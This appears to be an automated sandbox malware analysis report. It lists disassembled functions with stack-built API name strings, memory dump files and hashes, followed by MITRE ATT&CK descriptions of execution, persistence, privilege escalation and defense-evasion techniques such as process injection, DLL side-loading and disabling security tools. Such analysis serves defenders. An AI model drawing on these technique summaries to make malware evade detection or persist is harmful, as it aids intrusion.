b, xrefs: 0040A4C2
c, xrefs: 0040A02F
o, xrefs: 0040A01A
r, xrefs: 0040A4C9
t, xrefs: 0040A036

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID:
String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
API String ID: 0-829924176
Opcode ID: fa7f2ea7d06a1c11f4c3c7b418b5ab40c488cf3c469cda7af914d479c4175b81
Instruction ID: 375ac688da5934b688f4bcb78b3944943b62ad60df6e06d8cd5dc98f8d8c3c95
Opcode Fuzzy Hash: fa7f2ea7d06a1c11f4c3c7b418b5ab40c488cf3c469cda7af914d479c4175b81
Instruction Fuzzy Hash: 19F135B2D082A89AF7208625DC447DA7BB5EF91304F0441FAC44D67282D67E5FC6CBA7

Function 00409009 Relevance: 49.4, APIs: 1, Strings: 27, Instructions: 402COMMON

Download Yara Rule

Strings

y, xrefs: 0040A4DE
r, xrefs: 0040A4D7
t, xrefs: 00409FF0
a, xrefs: 00409FFE
l, xrefs: 0040A005
L, xrefs: 0040A4B4
i, xrefs: 00409FE2
o, xrefs: 0040A49F
a, xrefs: 0040A4A6
W, xrefs: 0040A4E5
i, xrefs: 0040A4BB
L, xrefs: 0040A498
d, xrefs: 0040A4AD
P, xrefs: 0040A00C
t, xrefs: 0040A021
3849, xrefs: 0040A3A1
r, xrefs: 0040A013
e, xrefs: 0040A028
a, xrefs: 0040A4D0
V, xrefs: 00409FDB
u, xrefs: 00409FF7
r, xrefs: 00409FE9
b, xrefs: 0040A4C2
c, xrefs: 0040A02F
o, xrefs: 0040A01A
r, xrefs: 0040A4C9
t, xrefs: 0040A036

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID:
String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
API String ID: 0-829924176
Opcode ID: 5add19f7e8998525be6cf22f90b47c0ff67255d3f501afb9e6df6ed236ec3386
Instruction ID: e23a1f506a077f573dc430d5e8b10672cd4dc9a3115a4b21629f4a620024b0ca
Opcode Fuzzy Hash: 5add19f7e8998525be6cf22f90b47c0ff67255d3f501afb9e6df6ed236ec3386
Instruction Fuzzy Hash: 1EF145B2D082A88AF7208A25DC447DA7BB5EF51300F0441FAC44D67282D67E5FC6CBA7

Function 0040D085 Relevance: 42.2, APIs: 1, Strings: 23, Instructions: 220COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 00422E04

Strings

e, xrefs: 00421A30
o, xrefs: 00421A22
s, xrefs: 00421A3E
o, xrefs: 00421EC9
i, xrefs: 00421EE5
t, xrefs: 00421A0D
a, xrefs: 00421ED0
E, xrefs: 004219F8
r, xrefs: 00421A1B
r, xrefs: 00421EF3
i, xrefs: 00421A06
y, xrefs: 00421F08
x, xrefs: 004219FF
d, xrefs: 00421ED7
s, xrefs: 00421A37
P, xrefs: 00421A14
W, xrefs: 00421F0F
r, xrefs: 00421F01
c, xrefs: 00421A29
L, xrefs: 00421EC2
L, xrefs: 00421EDE
b, xrefs: 00421EEC
a, xrefs: 00421EFA

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
API String ID: 621844428-215400123
Opcode ID: f5e13ccb45dd7d6eb88af039670a6e5ed4f7f518b2fec543e20f266a5a1c674a
Instruction ID: 7fa9d3f87a69afe4ac10df2f2e8729f5830c8626a82bf2b8b5b51c3dd01773f7
Opcode Fuzzy Hash: f5e13ccb45dd7d6eb88af039670a6e5ed4f7f518b2fec543e20f266a5a1c674a
Instruction Fuzzy Hash: BF9108A1D092A8DEF7208624DC447DB7AB5EF51304F1481FAC44C57682DABE4FC98BA6

Function 0040A04B Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 249COMMON

Download Yara Rule

Strings

y, xrefs: 0040A4DE
r, xrefs: 0040A4D7
a, xrefs: 0040A4D0
L, xrefs: 0040A4B4
o, xrefs: 0040A49F
a, xrefs: 0040A4A6
b, xrefs: 0040A4C2
W, xrefs: 0040A4E5
i, xrefs: 0040A4BB
L, xrefs: 0040A498
d, xrefs: 0040A4AD
3849, xrefs: 0040A3A1
r, xrefs: 0040A4C9

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID:
String ID: 3849$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4127283393
Opcode ID: 1b4a806f4aed8c27872cd381f6375e33a2eebbe9e1d627def979598e3a4133b5
Instruction ID: ad54936cff26b5a14aaa063f3c186eac5bd1450ecfe14e0f19b3fdc36f8b754a
Opcode Fuzzy Hash: 1b4a806f4aed8c27872cd381f6375e33a2eebbe9e1d627def979598e3a4133b5
Instruction Fuzzy Hash: C4A102B1D042688AE710CB24DC407EA7BB5EF95304F0481FAC44DA7281D67E5FD5CB9A

Function 0040A0D0 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 214COMMON

Download Yara Rule

Strings

y, xrefs: 0040A4DE
r, xrefs: 0040A4D7
a, xrefs: 0040A4D0
L, xrefs: 0040A4B4
o, xrefs: 0040A49F
a, xrefs: 0040A4A6
b, xrefs: 0040A4C2
W, xrefs: 0040A4E5
i, xrefs: 0040A4BB
L, xrefs: 0040A498
d, xrefs: 0040A4AD
3849, xrefs: 0040A3A1
r, xrefs: 0040A4C9

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID:
String ID: 3849$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4127283393
Opcode ID: 9bc5dfb5308e3dc0ff13c6cff22d55b6307f5aa29179759bab47606634119b2e
Instruction ID: 10e8b92dca063b1a5366c645984053d040c501b3dacb8044bc5d5dca4ae1d023
Opcode Fuzzy Hash: 9bc5dfb5308e3dc0ff13c6cff22d55b6307f5aa29179759bab47606634119b2e
Instruction Fuzzy Hash: E68126B1D092A89AE710CA24DC447EA7BB5EF55300F0481FAD44DA7281D67E5FC1CBAA

Function 0040D0E2 Relevance: 42.2, APIs: 1, Strings: 23, Instructions: 195COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 00422E04

Strings

e, xrefs: 00421A30
o, xrefs: 00421A22
s, xrefs: 00421A3E
o, xrefs: 00421EC9
i, xrefs: 00421EE5
t, xrefs: 00421A0D
a, xrefs: 00421ED0
E, xrefs: 004219F8
r, xrefs: 00421A1B
r, xrefs: 00421EF3
i, xrefs: 00421A06
y, xrefs: 00421F08
x, xrefs: 004219FF
d, xrefs: 00421ED7
s, xrefs: 00421A37
P, xrefs: 00421A14
W, xrefs: 00421F0F
r, xrefs: 00421F01
c, xrefs: 00421A29
L, xrefs: 00421EC2
L, xrefs: 00421EDE
b, xrefs: 00421EEC
a, xrefs: 00421EFA

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
API String ID: 621844428-215400123
Opcode ID: 64c9cdcc7045fca1891305a949c295ee54d2b1107aeca09793d00c2c4ef9d5ad
Instruction ID: a7e01ed0c0b784834eabc728cadb031209eee85b7cf6a95f8d00e9632e634018
Opcode Fuzzy Hash: 64c9cdcc7045fca1891305a949c295ee54d2b1107aeca09793d00c2c4ef9d5ad
Instruction Fuzzy Hash: B481E971D092A8CAFB20C624DC447DA7BB5EF51304F1481FAC44C57682DABE4FC98B66

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

